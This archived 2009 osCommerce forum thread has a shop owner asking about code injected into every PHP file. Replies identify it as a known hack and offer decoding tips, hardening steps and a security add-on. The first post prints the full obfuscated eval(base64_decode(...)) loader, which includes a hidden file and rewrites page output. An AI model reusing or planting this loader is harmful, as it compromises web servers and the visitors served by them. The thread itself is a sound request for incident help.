Guest Posted September 18, 2009 Posted September 18, 2009 I really hope someone can help me with this. All of my php files have new code added to the top. I did not put it there, and my host says it is not from them. I am going through every file now to remove it. Can someone tell me what it is or how I got it? Also, will someone please confirm that this is not part of the OSC code? The code is base64 run in php script and is as follows: /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10p KXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS93d3cvZ3dwLmZyZWVob3N0 a WEuY29tL2FkbWluL2luY2x1ZGVzL2phdmFzY3JpcHQvaHRtbGFyZWEvcGx1Z2lucy9Db250ZXh0TWVud S 9sYW5nL3N0eWxlLmNzcy5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS93d3cvZ3dwLmZyZWVob3N0aW E uY29tL2FkbWluL2luY2x1ZGVzL2phdmFzY3JpcHQvaHRtbGFyZWEvcGx1Z2lucy9Db250ZXh0TWVudS9 s YW5nL3N0eWxlLmNzcy5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhp c 3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY 2 9kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdBMz N FNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCw z LDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBMjA1OTRF Q zEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjQpe y RSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFIyMEZENj V FOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjI w OTczMzkzMT0kUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdC N 0E3QTg1QUI0NEY4ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMTt9a W YoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NU F CNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocig w KSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMw O DdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0c n BvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3Qj d BN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZ C JjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMz M jNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyR j A2NzMyODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUzMT B FRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkF F MzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0dXJuICRSQzRBNUI1RTMx M EVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29iaCgkUkRBM0U2MTQxNEU1MEFFRTk2O D EzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskUjNFMzNFMDE3Q0 Q 3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI 2 NUUwQ0YpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRG Q jkxRTJFOTApKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nb W woKSwkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJF I zRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ=='));
web-project Posted September 18, 2009 Posted September 18, 2009 No it's not part of oscommerce, this encrypted code. Please read this line: Do you want to find all the answers to your questions? click here. As for contribution database it's located here! 8 people out of 10 don't bother to read installation manuals. I can recommend: if you can't read the installation manual, don't bother to install any contribution yourself. Before installing contribution or editing/updating/deleting any files, do the full backup, it will save to you & everyone here on the forum time to fix your issues. Any issues with oscommerce, I am here to help you.
web-project Posted September 18, 2009 Posted September 18, 2009 you can try this URL to decode the code, as above code is invalid: http://ostermiller.org/calc/encode.html Please read this line: Do you want to find all the answers to your questions? click here. As for contribution database it's located here! 8 people out of 10 don't bother to read installation manuals. I can recommend: if you can't read the installation manual, don't bother to install any contribution yourself. Before installing contribution or editing/updating/deleting any files, do the full backup, it will save to you & everyone here on the forum time to fix your issues. Any issues with oscommerce, I am here to help you.
Guest Posted September 18, 2009 Posted September 18, 2009 you can try this URL to decode the code, as above code is invalid:http://ostermiller.org/calc/encode.html I tried decoding it earlier, the one I used was marginally successful in decoding it, but only partially. I couldn't see anything in it that was indicative of what it was. Its very frustrating not knowing how this happened or what it was for.
knifeman Posted September 18, 2009 Posted September 18, 2009 I tried decoding it earlier, the one I used was marginally successful in decoding it, but only partially. I couldn't see anything in it that was indicative of what it was. Its very frustrating not knowing how this happened or what it was for. There is currently a 4 page thread on this hack: Thread
Guest Posted September 18, 2009 Posted September 18, 2009 There is currently a 4 page thread on this hack:Thread Thank you SO MUCH! That was very helpful. This has convinced me EVERYONE should change their admin folder to a different name and password protect it.
rednme Posted September 19, 2009 Posted September 19, 2009 Just help fellow oscommerce users. there are alot more than just changing admin folder names and file names. it was mentioned in so many places that there are other security measures that we all have to take. hackers are in all different levels. I recommend all to take a serious look at the security recommendation from this forum.(somewhere :) sorry, can't give you link here, please do search). one of the things that many forgets is back up a clean copy of your working current site scripts. when you update files, immediately make a clean backup of entire site scripts. database is also must do daily with date in the file name. hope it helps.
Guest Posted September 20, 2009 Posted September 20, 2009 Just help fellow oscommerce users. there are alot more than just changing admin folder names and file names. it was mentioned in so many places that there are other security measures that we all have to take. hackers are in all different levels. I recommend all to take a serious look at the security recommendation from this forum.(somewhere :) sorry, can't give you link here, please do search). one of the things that many forgets is back up a clean copy of your working current site scripts. when you update files, immediately make a clean backup of entire site scripts. database is also must do daily with date in the file name. hope it helps. Definately! I have done many of the security measures before, but I think people get complacent once they have been running for a while with no problems. This particular issue was given access through OSC's file manager, so I deleted it and recommend everyone else do the same! I am going to make sure that I keep up to date on the new security issues as they become known.
swguy Posted September 20, 2009 Posted September 20, 2009 I wrote a mod that automates these checks for you - take a look at http://addons.oscommerce.com/info/7026 Contributions: Better Together and Quantity Discounts for osCommerce 2.3.x and Phoenix. See my profile for more details.
New 
Recommended Posts
Archived
This topic is now archived and is closed to further replies.